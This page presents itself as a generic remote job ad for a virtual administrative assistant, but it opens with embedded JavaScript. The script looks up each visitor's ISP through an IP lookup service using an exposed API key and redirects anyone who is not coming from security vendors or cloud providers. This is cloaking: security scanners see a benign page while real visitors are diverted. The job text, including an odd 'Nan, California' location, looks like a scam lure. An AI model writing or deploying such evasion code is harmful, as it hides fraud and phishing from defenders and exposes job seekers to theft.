Virtual Administrative Assistant
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a highly organized and proactive Virtual Administrative Assistant located in Nan, California, to support daily operations remotely.
Responsibilities include:
- Managing emails, calendars, and scheduling appointments efficiently
- Handling correspondence and preparing reports
- Coordinating meetings and events virtually
- Assisting with data entry, file management, and document preparation
- Providing exceptional customer service and communication support
- Supporting various administrative tasks as needed to ensure smooth workflow
Skills needed:
- Excellent organizational and time-management skills
- Strong written and verbal communication abilities
- Proficiency in MS Office, Google Workspace, and virtual communication tools
- Self-motivated with the ability to work independently
- Attention to detail and problem-solving skills
Benefits include flexible scheduling, remote work environment, ongoing training, and opportunities for growth. Join our team and contribute to a dynamic, supportive workspace from the comfort of your home.